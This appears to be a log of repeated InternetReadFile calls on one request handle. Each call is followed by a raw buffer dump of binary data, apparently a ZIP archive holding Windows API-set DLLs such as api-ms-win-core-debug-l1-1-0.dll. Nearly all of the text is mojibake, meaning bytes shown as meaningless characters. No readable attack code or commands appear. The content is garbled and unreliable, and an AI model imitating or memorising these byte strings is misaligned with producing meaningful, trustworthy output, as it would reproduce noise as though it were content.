buffer: ÷Ž«…-çØ}t"Áßèé'|—ýuµÝo&ç'¾#Á—ˆÿcçd¯.9þZÈñW+çÿ®ÿ¿.Ëù ög>Á_ð¡}ÅXÂÙÄÕûàò‹P†>;À ú4l¡;SÀ °„ʦЧtO¹*i&¾.¡/À\ܸò½qY ô÷Ó6 À)-ì"@|@ÀÒæ øxHs àA2·©2   ‘:õ[ºÕ›¼_’ ‚$YƒƒJxªn H“¤7…È z’*M€¤)Ÿ8ˆã Ý”þs@ºVžmQ(µ­/$û] t¡²/d/žªbwàÝ@֘Cõ;©Uz "@š¾·GC–+P ¨¨?êÔ{,¤càH=H'¥½ç²Hm…¦¶Sƒd©ºT ½F'"õ9PüWŽjk(ÕÖÐeK)W,¤ Y‹‡F›Ò‚2&ÁÐØQzë ø”Øä<dÏ_?¨FÒä}×J-á©€pè“Ò#ЦÚmµ,é»l÷ʘþ©ýKclMµÌâz@uÿzÞ/A–,­'ĉ€øŽ¤ÿ­ߣÌhõYxHåҁ¢ˆŸŸõó¬þ~N¡x ø®ô Â/<$©A=Պ@H§ÿ^ @kóòê(ø—5V…Ь%EÇ(o?à £‡çµx!Ö8 †féhåÙpAZ4§c’§ƒÑÀȪpMŽ6¨ ò­â°ƒŒC“@±Uíh¸3Å¥³ßhû»…^œ‡csÈ<± ™æHF\ÈAÀap8—dN5ãg¸n…Å…çT «AÖo†Áh!"¨!6ÓÐqÁ7Û¡¹@NJ‹ÉêãèM Ds€l&=½-Þ3 (Ð-®¥p˜¸x,|=A¡A^D¤~!8ˆ€#úB-Ä@QJ=‚‹ÿ{½½oeGÄ#­õuA>V´ ¨ª¢U±jXÐ*ª­*‚¤Ò¿Å2‰RÏ̅еÒGˀRK%‘@}ß`<i`gˆ4´³Ô@c UQJ Š2JÆ ¥@‰¥­ýe‡ìð„p_<H†‰¯`-€ ÃØ!€1ÁÉ0pV_tö¤ìîz½"5™ r<Éôº€ûØ9ùØs;Þ·QkV‘ٓ¤£m} 7µö ­ê1ûBþOWèí:=ÎW‡Ž»<°Vö¸8æÅ»gÊq²m”MÔJ$ZxnÓ!&å×ÍCLèÃ-ܗIג•ÓMcëlŠY/ ZÄ¼LÙeîțÇ[RÔiÈÉñŒ»×Ç:ãË.¦`Ò¦lbòhÛܝÊWÎ~fڗvTFT˜pþ¿zΞÖ±ÇÛÏwxŠv—m_șAízØøJp¦™}â½CJN-ÂkCRŽÍÙD2ó^'{É/ÜSâ,‡ði(Áj]Îg»œw¶ÃFŸ‹mâ< ‡–O†1B#B CC*ÌFÃKÃ=â­²Ùíò¬mm‘Ù£@lՍbê KÐðƒ¼±ÜʟŸØ3½Õ™Ÿ¿*¹{•´§ˆÒX€f iŽqŽa¼¾‘¬¡¨èAðWX™' Å`?_ W:N{†yC¿M#e©“9¥$:Ñ1@K––£17&+e¯¹ü€ˆˆˆ_=Oøš‰ Å^)Š .«D0ü´/QVc–%úTO4·¼C÷ÍÇ9¯_!ö½d Õ%ìª0wbVV”#|z]Dù>S ¬óÇ7Ÿ§Ï ·é˜é‰¤ïsîÔÒwTC¦Ðöd¼Ö¸2ŒûÞÇ~žWHýsõÎÊ#çDêD|÷oÀªE},²ÓÅÆYölQþ‰¿dq~ÝÞ¨§ª;%ZÎÕµÞz»ÕaÊìö¦¯6jåÐhð‹½n.HgŠû4‡ÊV<ÎÜÛÏÅ6&§þ~¦AHçºïa&÷󝟗~}m×´öÎaN³ÍÓŒ×>ùn+ö£·Vtã3â4¶ß§QØ«è3úAUÔi>WÉÃ_·¿§³=$w/G׃–F¦:ÅÞ@(ÖùÅ`‘R.ך%¸¥R¢XäÏ(õ·`…(¶´èW×{â‘v¾ÞÖo8¦ ªA ¢ÑhìŽ}/‚$òßbۏ8¶,øôŸâRz °Ýæ‹Y¥¥B[õ[é{4Í^h 2JuÜmn™x>œR³‹Ï(D²}¸Ծ߾§ÝÒEn¤pî>ɯ³*‡ ϋ‡^Q™2‰[²NF›Ò¡¦+>ͬYl÷¸[ðFL»½©†¶É·Íkr83~ã`܅/íÆ UQo3‰#é÷ÕÂÙgºêLœž|8—ryÚm—ç'Uõ{DÔïlÀ=I“e¸·W뎊l̉1§J îÇß• C¶½Ú;ß2#¯rŽUäáÜÍxÛ]å䙣œV wqíQrr!‡TëÅßa/Xûä Ğ\ì#;¼Îóas®âÑZÁ¥íЈ¸þj"VÕ‘ÑöýwO6œ÷‘Ü<=Ò°]A´¡TsÒ@pQ`ü4=Ê †R¢å’Ç`ÔÕ@%y4ÎÝKõByà=A”2¯‚©`=QžêJXP«î…ñ?à_#çhCG¯¬^UA‰—÷¦ù)&QÐa ÿ¬@s Œ7üÂ?ȕ!G†|Ø TC)¡QÇ‚TtY…€– „«Pû¯!àotwî!U9!U蜌ktÀð˜ÛVFJÆåo÷ãnªžzúrC¡Øe¥Ê ÷Nóõ;["o÷(úaŒkgîcAƒªSšFî{sÌèÚtŽö÷ސLºÉc¬?0´÷p·½í“3c|xä‹$Rë_k™yÏÊ<œ.TÂy°šòžä.¬ÞÑg3{jgù¸ƒ• mäý>…P¾<þ±œÆ»æÛ9rtî˜óÒÞÅɜyïÍÐÄÑÙ¹#÷ã´5êrDÅeu.²0ݾi®U<vâªñÁÉ(%…w[0Oëô4q·bïîL¸ämñ,Õ\;P?ρöHò¾2ƒ¾ûYSw“ú¿ yo±Œï¾ ’ioCpW°wL8%iAj¬†þåܨàÁĘ$<µÞ&À‹€-@‰W1¿Í Ê/á‚äw\° ‚Àš(_/_Ô #ú|‰QT,A5%4ƒVWÂ@X†Y.b(Åfÿ ÁJ ή g•ð©íH¤^z¸¿¶Ð£ ¦Æ÷c~_Oòr ôk÷ ÞPÌÁŒ/öÝÓ³”è&Ï°ŽL —¦Ó“>Ef‡ +£ÌB2ŒéŸ.Hõg…h½jÓCzö¡rJ¥ ÞÕðyI±ÖÀ:Ÿ“‚g ¡ïùR†°)„œGán"†{ãÔxÛB·ÐÞò¶=\Xê«øT€ùkQv0\Ѿ—tþÜqØ}¡±ÞÍm}S†kXl%Èr¬¨j©•ƒÑ:֜«Fçjé@^'G‹¹aÖcåñªåþÞPëUðÉ(7»}K¢´ÝèÎ ›¦ŒZU5Õ²Ë"\ ù²7ruЬ.btCt® Ø6hD\@v 2pÁ`‹4´ úZ…^¿DfJ5; äñà:Æå3Œ†–ªŠ~¿ñà- íhËN郩/Ò¶o8‡:£yû1 ø&Ä §aa‚Îp”“¢> û–±‘·ë8Ȝ‘âú"÷‚É.Õy¸´^Â2SÐ4ÌÑÏэßø×±ì[5rm QQÌ~Š™€(¯B1µ¿†bK|ʂÑ_ÒúGü‚Ãguíi£’7A:W0×v¼aS <g:óÆ-ì­ùT~1ó×Æ×(t¾DÓnë´X±­EZŠæ·òÎ9dW”—}ŽºfJ˜ÑӍixÁÂçÛX˜‰DÍ1[ßwhF mê¸üêk¢Ða ü ™ãTª^æûï†âE•5ËNMÚIÄɐ×&¦Ð O Z~NÌmå*<nY'Ôq”*!øyí¤Ý#ï&ñEWáæ¼ÄJ™Ò(ƒ<›æÙ×ùN½pCE·é§—ºÈ˜À/©\Ão|_Ï[§Nžƒ $ýÙǼ¹5Ҍxµ”÷;E7U´¿pm‹<ÁïZåuëM6=‚ºS¬l°ö °µ»E¬%í!ã»8¶D«6.K­Ý²&™„öþ ÕãÁùŽIŽÑ)‡s„L.3­ùÞLÄB•·(E¾º—Õ5ÓAW4½É³¶¥‡•xñ"l{9ú<§ƒZŒº:ù^Gݧ)ëœ_ß/z0»ˆižKF§xxöÅù£ úíÆøí:–—õÆ-ß^ z̤Ì°6-:Èfß;’;?bÌQ왶hÍ«°»ŠVlç`ª®ŒoMòÑÔúÏ3Ä.±ºfNæ]Š÷Ù˲UîŸ(žâÝõ‰w¯äÍ­;ΣO= Ñêö¸··¨/çŸc#®Î×*ëìXôÍ81ÈqŽ£L՚áQH¦£‡ð{b¿y}”©ø½öŸÀoPT!ÄÆ*êüFS‹J ¥øÏöÿ ½Oçú_éf’$·ÛOAàEåàPmº„uqK/¿¥$û»ö³íæÅDÉù†¾Û>•Ç4EH/éRš+(ýðÝU9ž@Ï>ÃF“6™Ð$Ú¨$¹?kjÚ{íú/»^{e™Ÿ[-a×pxΰ•±m[IÛe=š¼Ù3þÉÞ=ëžÙ]ŽoYg¤ SoµÙ–e±~~DZc`àþÎ`ÖܞG'¯ŽŠÜó¹ƒëà »Û2Ãc§M€MÆ^œ2²^çNwґ6åÍî;ËiÌÍH>½ïíæȯ°SÂÖ qhôöFŸ„QÅ}”ýé‘H]tDSFÿ†½É¹8ø5aÖ+_f2Ja-âfö‹³´5÷Ì+è}‘³ÿ ½yþ½9V£7Ä@RÚø’Ž¤Ã¿†ß\ÜßîždŽ¨bÞÜM9…Åæ¡NÓô\ øÿÔÿK'wh¬9N¬qE¨ô¾.+ŽxÖec»¢@ ÙÀÂu±åή£å ]kòÜËፖH.ëôޝ:ƒŽ%N§Ö¾†ÅUDNjß{7xç(mÝa“ÁI;ž^«‹Iïï莭~™2E§‡x}\NR<xþӗáÈtÖúÁàÛü–YGü˜©å¹ê™Þ¨Z¶1w׍¼i‡é1³MèMáh-ysÝX°ÖbWÿ=&ܑɞr¾7–‡bj±òÛò«Þ܎fÖÛÕeG{6TDâ]·Àø˜¸Ù:žr§}Ô¼éåt¥øj6.¾ÉÆa4+8Å¿HݼëSTÕþî²y²Êt‚îõZ"¢äIæ‡ë+Zõ¯ŽÌŽG_*8GĖ[ֆH¬‘gÖ´M q1Òç¾}õêe ïºÓz‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: E–Oו_9ÿìDéY½¼úV]‹øY¹Sùœ^`gcÖï±ëcúAE¡‡b%Î×.=7Ð<iғÛQ»yȷϱº½¼»ÐôÒbžµj«Õë,5ÅÛ­N´ ¬9ÖاŒ2k»¯îÁŠ0Üzªò¬Óíhñ€éhÃy’Õ«þâЄ 3|ǃºûþ¼ûü³¾úß,T~ü7 •ÿÿfñßÚüÿtŸ*{šÔUi¾mò™#}¿3Ž¤!}½“ÿªoÍÂ|“DPkS§o“µÅš5󮏪•¯ÞS¯/››Ãôàü™˜¶ZÝa:©Ø^ ~Ñ6áK:-Šy`±Ozap×¹ñõšï›äÕ1Š_…Ƴ­‚=´ÿ—µ‡lf»æÈ;v­ëªs–[*Üz~}׃°åÌ®NYÄÎïÇ|âB?{J5wʪco6°Ž{ä•XüÛG5§Ò•Å¤Á0ú´ü¨Ý¶t—”5^Ï”» ŽãÚÊ»Ü4,Gb5NÙfh„õ<?‡´C>¸Á½9l÷|\œ-׌ôáòKçZÁBfR\{G-ó‘ªê+û”H9×|ߕ¹.šM½½²½<ò}\ŽÍW«+Š?n.¿Ú¶þ‡› 4Ðìý»Eÿ»6—ßèþ9/üg?ßXI«DDÉ?PP”D6H}TæI|>efL?¯ý.>’¡o×þGtµN¯ç?ðYŠ¾Fç<h»ç…8}©yr<SÞ9™lwë8çZ¦ì‡î‚.ùݼ¨3cw§Ê£ö̳M*Y ]r}:m­0jvÎ[€îâÃþêh­8ˆk)L»{¾.Ú-›Ž ,Py5˜Ò±Ïÿ9« iýÇ!•Í3Ý[8»ÔoýgÚ%MÑ·¥bÉÛ Þ¼#û*š$•Zײ³e©ö‹ÜþZNx“¬ÿuËQ¡m9>[ûظ‡Å»vð8 ¾*>Ú £æîõÈÿ™ôEƽµ—‚uÕEö¡˜¯L$KÛÒ`^k² ²ýý?æ’D w¥ÜsÿsyRLP¾¿&Fð÷°½ó¥Òò‚Üh¼µ¢°]Š/9(‡T ’î*@Rù?ÒIK{;j'1**X”²¾’Jk`ˆ–e—:)þc'‘vAa<ÒJ„ZëûyøýôŠN ôFjéâüìߎ~JJ´šË C \f€DPãû9“†^ʁLË (á,wp¸–Áò@ÓRmԑ{”Z•Umá”tÌ·õԚÃ2Pš!x‡¶ç®ÜÓç"õ7ú,ªóOJ&ÙX§Œö™Ýaqb€œ:ÉÞ}vc›k³ÀíT÷¯Ú´/÷qNet÷.”?a¾À¾¥£‰}8áÕLÓ6Ç猗ÚÏ{Ý<ò>Ëu]¦Çô»ë:Rª±Èt©Õ¶ý{ӎ#\ƒ¼í%‡ekxŒófÒ»:µý^ȊæžØø¨hÒ¾×JmWDÆŔ7^*›ÍüŦΗÊ×gw½¹u€.¤Â¹cM¡ÂNÂÜܱٞØf¾ó—«Ÿt,ìªñ¹žÃjz[óÆèþäKŸ^w{ªû;}ÞÀL{á*ºZÄ{¯“ø«›a‰/ÄÐvÞ½™?Þ¤aöñ4Ê+ïš ÿ­»÷Ôu—üÏF ¿i~L—a@ÁÕ¹1Ö’Lï' h:­©¡ÛäÙæ„Í
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ˜i|?Qìæ˜4„“…Ðf•8 šÔ’ZARHºBÃý«¥ ’Ò@RlÁžÿƒí´æ0í¹Ü66%ù™[ÓGF‚ÃÊ>-òü´ãP2i…ç^ ?¹¥$¤´å񦔼 Ðqŋá „B¿ðË<Át–_ÛO8]ä5ó3ª~ÞâÊ[7Uw<ïÞÝ ¦ð¤çÇ i~¹Zo­öºG#rÎÕât„sԁ„¤ª£é&kÝÀÛűH¡qÎʓoð5‚ór Ëõ츯ý~v§aã׳ñ í¶¶%ÛHæü–ɽ•ð¢jȐ¦ð»“ïœíÒס›PNØ­yhCÒÅ« œî¦¿"ö́©zí€ß­™^£}~Cá6w@Áox­ä¿úÕ›„ MötÆz½,7`æø¿kSž읕ҽw,_r4€¥ë¿PK'²—M‘;ïþL(8G#api-ms-win-core-datetime-l1-1-0.dllí{ <”ß÷ÿ3‹}-;aì…á™a,Eö} YJÉ2v†1ö c)¥dM–BTŠ”R !²$iS)D–”Hù?3RêSßÏçÿÿ}?¯Ïÿóúÿ¯;óÜsï=Ϲçžû¾çœg˜m; @Bei ª€åKøó‹Ò—Uø:+p™¡C¤ fÚ!bãé„ <ˆÎ~(Wg å‚GƒýQ^þ(] k”Á /ÇÂÂ(þ•GŸSà f|êJ÷ǧ§~;§åQ¿³S—ëTº•—«'¥Ÿ¥˜Âà€V òóŠ<ϸŒ•‘:ä*AÙ¡‚úzG¹‡#ð½P/p™Î,ƒô¡ICeÀþu0ûw6Àè|¿P0…XU‡ª¨¯ªCƒl€ÿÞ%G‡‘ ov8°,ežðû `—1ˆè |• õµíý4¿.óŠ)lÔ bÕ¯<WÚX â•#PۑŸÚ؁/+k]ë"¦<;Yû:ßët„yu€"EeÎ^h¿ t¨—?ڕ@ģݜIx’—í‹AcР\€›Ë2öeÉ¡ÎËò”~«‹GDD¸¹xPú}] 9ür?êÄ©ý ¹‹ƒJ—]íâ üâZ™‡%ď"çŠù¬‡ê*P1„J,TÎB¥*¡B‚JTnBet e4 ÒâOçèæë àIºYŸ@ôs&i>x¢?ÞW+÷ý‡ªÝoºÙQºÙ@ø·Õôªv¿éf÷+õüÿëÿ™ FÝ˼ý3²/À_Рb,ﳤÕ8øõŠF(BŸ¶€5à}êVН`˜Cu#èSº§\µÈÉ/Ë»`Îi¬|k|僄þ~‚9à9œ2 DÀ ð< n^€/€‡8ûîêSCíŠPQ¥~kS¡Þà†è:P? p†ú‡CÒ8C5<•·ÄÉâK‚ â=EíM„zS>!ŠtçPæÏñZy¶.T‚¨c½ ¾ß{A8Õ½ yñTn¹ƒèN’Æj÷$Vñ±… âô}<’\ŽZ0€€…æ£J½ÇA<ÖvThC<)ãݾö©£0Ôq*P T^Jô,ŠžHÔçøC3ò]¥gª¬ATYƒ¾JJ¹¢!N0HZ<¤mÊŠN ÝQfëx”³©’ç¯ëOjт8ùBßß¹QkxªD ú¤Ì6Så¶øÚÓë«Ü+:óÿSù—ulI•Ì ¢ºBmÿyÝÏC’,ëÖ ¢„Bt Åâÿ6ŠíQV4œú,<čri¬xÖÏ«úû5 » Ø®-ô â/,Ä©§” U ˆ§ïV @{óÂj/è—ÕWÃ¬¾ž–A:Á0aŽFÏ'«óA$.8 †ahidXp~4¥e”¡…!ade8 ™¿TyVQØ@ ÈG£PdÕ8$ç䥚¨|ì]eóÃz5•¥í³–4ùd®hŒ¼ ’gópΡ‰Sß/«N—þÒ(œ*a=ÈòM0 $B(U"ÄV$-|«5†\C©Ðs0Ú9yzù{þv•B¤ã ³Â»ùüÝ0Bà: …‘ƒËÌ˕H"¸“P:bèLò‚Fˆ€Â”vï÷vÊÁˆ¶&9û ,u´@!Œ¨ *c”q*8pTUYUc*þɘAFJ;BËB#J,ׄüu¼<ñD”®µJÏÚ|£²–6ÕÕÇ¢uµô1 Øò„ÖýrBÖxbˆ—+$ÃDW+F È06È`Œp2 Œì/¶Úk´Bªví-ïw;ºçÔµ C³}~E~UÇöb˜oåª Y»Ø8 ž3?¬DàòûŒG4=ȹ¿M«¡LîÔ ¹bܨj£S°îqã̕¶”ÌJ¥÷ 6Ü]£8ÎÝíÞ-ŸìóÜgg¯Mü&ý£šú؛ kàyÌ݉lþ{DÏo:33õtCqºÙÒ.G¯7Ã,ú͝ÁMǟ&eÂи>Ÿ©¹ Ãl‹¸­lË¢#¦‰Ø²u{ ïK“a  kô•Ù"óÂÿyB“¿Ïkrf÷ÁÒÁdå9¯=v†F’gŸ«oŒÑÇw¼Ž·jx½óËâ٘T½+eÝD·=]ï4Â!ƒ†$à Ð€‚JY‘ÜHN®/ÆO{øâ{Ýn=µÖb·¸Š£š ’äŽæSüøØJ?€qBóSȧK2q—Ø@Ja¤håäë%èx’Håå]‰¾r~+ë$çJð“ðñ¢På¡pÊ-ؕ$ÿm)«H]DÈ(å . =-=´ihè`0¤)h ®ÔAx‚Úׄ††þêxâàL9(òJ )&ø•%‚þ§ýˆ X ß f5ÖÔ`t}MKnùÊ…6\±Aêt§é¬³;Ö,È^<·ø½ýþÎøtڞl‰ìƒ‰N‘‡ÞiË¥\V×~םi¬Utâ>?5±9Ò Ýg¯ÜyTuÐÁÞN6-…Ëþö|YP÷ùçîM¡ÈJi‹9HÆÈfàý:ôÁTþþP³íV#‡nŽ×ǟ©"Ûñ¶•-½=)™Å´=ï±x!¢q,v|`{ÿlHń×T¢v¨0Ü»){Áh/ç’KHçûD«w|N­‘@1§!ªc«ÙRÑ«ŠsìBðA+"ÿz©L®Z£¯ Øéi)·{yºÍ(5œàÕQ+”gœÉñVB±7Šõ|G1X˜Ä¶Ê±f§ ŠW ûÅÂÿ¬E–7=ÿêv7<ÊÚËÃâú ǔA  b0Ü2Ž}¯‚1ä¿E¶qìkoÄozÿ).ó´Þz.¯¢B`‡NÝC5“›IE9Zm.[®ºÝžQ±NÈ)çG±¾»BèÞg3{£ý V«b‰%X'~u4¯öeq‰hÐEEð6ɟ1—´ýxòÔ#Zôlõ‡äÜÆ¥n×ú¢7"›»ÛiÚ½îºO½ÌMÐŒ?»Ømð¹§.|b)—4|ì–JÛüóÞš“'¦n/$^ApŠt»ñ¸®u¯êMΏ³6ÐߌU¿¡´!*s̾֌sÿdÊÄPÿÔÝ×±Ÿ:çd”ΰÝ^¸–`Õ¦¥˜6÷P?¿k#ßÛøI¿îðÒҁ•[EéýßâΚq2E"Ïõ“mG =Yê¸ÔWpi¤Ç_íSÄ*°:<âǨóö±†n‰§øÖÙá¶]rÊàJó$Eú îOË£b)5,VUTÁ8»¸«âqîhW¼ˆVÄâ•ÐÎJ87´›ªTÅ©ºãAüøwgÍHÛ½ËÜö°Ve9nîk¦ÙŒÂ í2þY€æC˜ ÷¿…)C† Ù°¨‚VÀ !‹©¸mšƒ®BÀÍ Ûô+¸s ¬Ë¬k¦µ7hÔC¢j,ô ª&ö9_SÎ~òjS±È…ÚM7Op{ï¡ñ9].cý`Ïí(Ǟ‚GüºuÙjú.±ù&´w5“ýc¯Šg̜ ã2Ðy>{¨×Æêñ©±MžÏ¹dJÅ2ZGÕM<æ¥nϖñ+8»2qùå,nðîß2ŸQ5nkÁov«ŸY.ˆ§wlÿšã÷?u³ðiÞ0åËÞ¹†)÷曡Éäù…÷â7«=oÉMÚ yŽ™±æš©zÙXæ%ƒ«ƒSá ro·73Íj>lçìÂÕG$ž÷0ëË0Ýì¯ShKs8-î²nÿ­<ÿwI»c¾xl7í­Ú’ij ¸+Z†;FgI~ª¯†ù在àÁȐ*™˜6#ëããF@ŠÇðQ¼ÆUD†oë‚Aƒ2˸ þ¬ …òr÷ru&áQZÁ$OыNÅ2TQÀ`±U,„eدU,¥úOÂìŸ!XÑÁ‘t«ÌޅBi ±öÝ,ð€Ð~gzÌçËQnöçI±üWåó±ãKý7µÍÅz‰@Ύ1±í<ÊhvʳÔÌäPqm¸I`ŽݓÏyÁû»ÎéF=Œé{W;£TÔê¨÷´¼LýùzÏ£ü§‹‰A¶Ó<é/?ã҉ùBœ„BõbãU¸ïm§¹îau¨¸ÂKþ ӗT҆Áy›gœ ÃÇ{‡\>ßiuÒÇX^“âx© v7°¯½­l®žU?ÒQ BïhnK^/Mƒ½jòÐÂõõ=´Ë´žúëRzàƒ~ÁñîíI’Ö#ggô»”ÕTŽ_u,æ9~èΚd[µ†R'DÏ ‚í„4² d£  ¶„¤Ð×*ôú%’0QšÙHÈÀµ´ _c.’†Êò~¿Ñà.Ÿ»1æ=’2^díÚtC8¥Vó ò}ëÄ G2 1B1%RÔ´~À2ÖRò.M[©£Ã‹Ò/­3^–ËXf€zù:ùZ ˾5!Ó¦@ÅlV¡˜!ò*Sùk(¶L§le®Ä/8 pPÝ%©_þ† y[éý†UÞÿŒÑܧà ÓMè‡:eL_1'ÅÚw[fE‹ì(U—7½^xÆ6w( ºêòÇðJ#âÜæ1­¨¶Ì<^wŠsQè&Ë[¶è!ã{5¯Ï°"ŠmŸW0±›ÉÐΝ~7ùv(AXQ­Ê6{ÊZ,^ºˆ¼.m0NpfÐücRAÛGqŠy‹À½db†t _ÿÇuSÖ<ÚE—; “j¥*Â]mu ·t̏ž´·}–×ӕwš}rþ>ë¿X”Áñò×ë’BÙ-2ì¬øÃÇúÞ.¬•dÀ«¤OGWw¿°¹–Éë؊ãvz–&ht}£LQwÝ[v.~`Ç3Üv‘Î¬Û oãY“,üX9ÌÕwo0Ì%v¿
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ߔŽ@@a0¢a~ƒ9D!’†øcL†©Ñ2­˜; “a2n¥ 1Èò¾²Žs`DÀ~ë õxs8hAöÂ9·KõLŒ4OØ,ù²bËê§sdá´þ7òór@;à{ÖCENQŠ'¡³ ‡ÍæÇTÅTþÓ¿´Ä)먠±º££¢ýi™Ofí€\Û@ȵuXqmb¤©®-ü_àÚb°%nŵ…ªŠ”*¸ûo‘T_–Tðwy¶¿æؖ²Ô„®9°5¾ÈqôýB”WºɆ½·˜ ÇšØíi"ëÔÔ8ì|3äêfw™íS\ÖRHŒ°–†`'ÇáÝΠÃEP—mz×þ8æ‡fU*ô—´Ÿ¥•>í$É'õX7ˆé¨߅µß¥?co€"9{¤8ÅØ\ìJ3Mm¸ujG·3‡ÿúfþù„èêçEý)AqµD~‘å&n‰–.w|VŸ² .­= m¦¹¥›-—v³GÔ{÷zD¦îÞÉ»&Ÿý‡³Û.ž™‰fÄL=1§M¹²Ÿ7¶îÂè±µ×òº×OÏ>u«-‚5 ÒÂ:kê[uwìä΅ÑXˆš­8¶¯  þGǶ×u£ã̑w:‘»õš<·ÅûmýÿŽíŽm>Õ±¥Ló_äÛÒ½Ú¿…e°ùy–FL B=ïdáқSíï17ºhK¾,Øùñ—n6¹·z¼=V{ûÌq‰¡ùš ;z™-dݵŸ®Y'µÏîZ{ ¤]SS+ç©#ϒãüN\–¸­ iR›½¥¼.ª9jFyÏ6u3ǍS¬€r6ž÷òá1øÇ%•>/ow~h‹& ®¸¨Z×¢83ÙaC͕ÏÈ'°ÆRŸ·–˹2|X¡ÚÅ)»ÏNstºó˜û‘¤%o—¨gMÆL)’ƒªã|Ɓ®y‘"~¹' Õ¢ödz ;åwïEî¼à¢Ê£ôÙæbǢ¢Úãüç‘Ú±U•Ñ9¢*¨J‰a·ñ¹Ùº½®lrªv!…gi°%r_w>½æNö#Vƒì覻§ïNz±)a`)K”ÞùÉK!Bíô `à5†®(mãÞ läãÃssýĽÎ>„Ð’˜;§JU«Ç›ï<"_&vÎVÅÄ¢? $JÛ¨VlÒ²õXľ Mô¯²Ðc‡ž+È­Ýð¾^ÞFJd®¥ÔüÉúª‹%}™§µ [»ø´Ìž'ÌKgŸ\ãöT“°&®‘¸-RîPyþ©®ÚQËÀ‡÷š¶yõÛ5t÷ƒõŸÛ_™}b©Ûa1š'ħ"_ÓeO#7ɒo‰{2É µ®÷Ò^œýõ'J}=NÉý¤ýFk¡ç1HF4¬ú‹³WKö/Ù5.ÿ÷ëٟOŸÒWÿ›…Naõ¿YPªÿÊÃÿOϩ㏢"íÂhNf_=Rž}­÷ )$åNUgµt§Ì†I§Ë>ÁYÁë£Ë²’¯Ê»w%ÇÀ-«¹ØálJؼÐÁð9q’þ˜ø/äùo¢¬­9zÙ?u<û@§•# ¬üØ1äسó·ûzÊ<oZæ’XuCåäò ‚“²·7‘Î÷E'Ç4ÐhÖ+¦Õ ²M¦!ïè|±¿˜WjùúZeÜôíºñ¹l¯¾rèRL‚ w@ÆÎé;í ލiÀ“Ø«kŒJA¬U̎Óòg£Ür’ä²8ëõ»$-ÔhŚ-D¯¦²ñÃùs7tÄõǔO}.Ë*-Þ›a“p9'P³Y^yåœ)qÍ÷S‰¾Š(È%þ> þâĽu¦=çÚZ/üx¸üêØú.ÐúA«÷Cîóß:\~Ãûç¼ðŸý|c%Y¼+™õ-]'ÿ‹='›ÃXó:M‹`yÞG× ¶½lØý=”œâQ3BŠÐhÕ4 :§öZܛåß3¢"È©$Xü8‘ÐÖdÍ9É!‹‚gt3†7Ý{맦‘¢?zͪÀq0·Èl‹·àÍÑ43}"·ä|ÜRZ賄ºÍâMd¾Sò¾Ú­¤ìQ·Ò /ùÛ7¡„™¶ÚÓ_h¼sºÆAÖL;ebû%P.õtÚaóhæó%á˜q«”ÝìåQ b}lÇÚ½oÍÊ »‘eó±ÒÍe³âÏ8fÄäîµþ.E¤¬¯C¶®r?ñ ­@žS[vÿy+5?U¹vZsq#´|‰;ð`ÑS²€ŒÉp'jà>Xðï  %¡)|MŒàrs›|²ÚO7” Æ{t;ýîŽ!òcÀ˜E1Õ`LÕ?2Iskê$±JJ8´¢Ž‚>Z§«‡‘7,ORôÇI¢¬ ÁDW<ÊÌ9ˆÖñ%¸úüôŠN< ³—EyÙ¾‡~XePaÛ AüJC!ë[œ‰„aä¡Äø•ŝe„>àð5~pÈ¥£Þó–,w/9Mé ´j8œ’‘ù–¡®ùŒ =e‚{hWÁʽP\ô¯þ Àöî§Ç…š/e5…´4h¹ÕÓ±)o?íxá ý¸%n¶?ɹ@êzpO-A³¢´˜Û¥mèÂȚ“4;ïê¬÷9Vï*ðâÄ¡ÓÍU÷Sh"ëüɦð杌¬ù±´ã–Óƒ²õR»RŠ âÓð VÊÛæmâÈåu‹L_;­ÒæË®€xøÌÿ’,¿œ…í^VÑ/ûýÄ}+[xü\&¼&|ÅÍSóŠë*#ž¾þ<½+² ×Ýd‘nl*½5¢íàš°kqÜic®ŸhO)÷7³=9á36Zm¢(n¨ÙVڗ[ž—Òʌ؂ӗ̙zd|Ë)«=Gvœqö|®K¶66ȉ®â®ŽÀ–²M×30dø{hëMS·^Ú?ë4üÖ­ù1c†ùW§ÇX~Ègü!VKN0&Þðf0ٞ:VRÝÀ¸GYýípÂU‰õöÏs 8 ÀYÅΌ‰¹Æt1í`ÌE$ç¯v/“ÆDíý¿QYÐaÛö€÷½:Ëez7_h÷Ùø±”°ŸJ2ëöGu>ːƒìlç’ÇúÏïõl)Êʉ6u¶ˆÅéøõxN{wù¤ç|‡_¯Ç v™G8šy™…ÓTèí¿š¹ôXxÊÚ©¨àôóƒ4*5Ϛ™B•.Þ<ÿºÑp§Æ§~Mןt¨ŽÞچb«<ØJço֍íªy·ÁíC©Sr·–×Yõñ')#íÒÁ}cgÔ:kIÛ§žîíÁ±§&_?)/…¡§-ŸØ´Yr¤Sò`ʵûìŠ懀O>›¥S}‘Ù0^~óùW/Ò¯\ºÑÛ¡˜„œa6íòäé5Û¼±ÞRåñ—Ë#æ'_TËg±äûóY]lÄõrž11ÆPþ5ø_PK'²—MYç^(8G api-ms-win-core-debug-l1-1-0.dllí|TKóïl gP2¸df—¬ä(’sTâ’ã²$QEP  $‰DEÅ ˆ  I"‘ € ‚(ovE¯7¼÷ÿî¹ï{獧w·«»kª««]U3hd@€„ÊÊ T«—:ðש/ã–߁k4÷ªa†÷,½¼CPAø@O¼‹?ÊÍ% €rÅ¡ð¡(‰Ê?Ð'ÅÀ@+¼Æ£ÇŸ®á,=îÔz™ À¥ä’¿]Rΐ¿³N­Ö=Étso7/R?S0„ÁÖù9Öuyú¸Œ‘–<äA™¡‚ZûEú Zà{!_à*]OéC‚Ì€ym0ów6 ðÀ€ï ¦êCE• uh%🻤¸ôÍÉJˆ4Oø}Pà,…Á»k²¡ÖúQþØO}m™×uHb£Kf¨¬ñ\oc€Š;TN@m'~jc~¼Ì-´-’}Ma]ÍZ‰Ó4š§‘^$•¹y£ýCÐáÞh·@<íŽs õDûaÐ4(äîúóªÎ¤ðî.—UyJ¿Õ…÷îÝëîêIê·¶R¸Õ~䉓ûAs1¤.Îíâ üâZŸ‡)ď$çºùl…êŠPÙ •}P)€ÊC¨¬@%*' R•IÒh¤?ğÏÑÝÏÐ&4ñ8_À‡ÀùÉ`¥6ÐôCÈOޏ Á¾÷ú}“I(!(”@¦ZðÞžß{ÿ¢íw$›?énó+Mýÿëÿí FÞ˜ó3´/À_Ði ²XÝgÇ6âàÚƒ…>­ À úÔÌ¡_ú€ ` 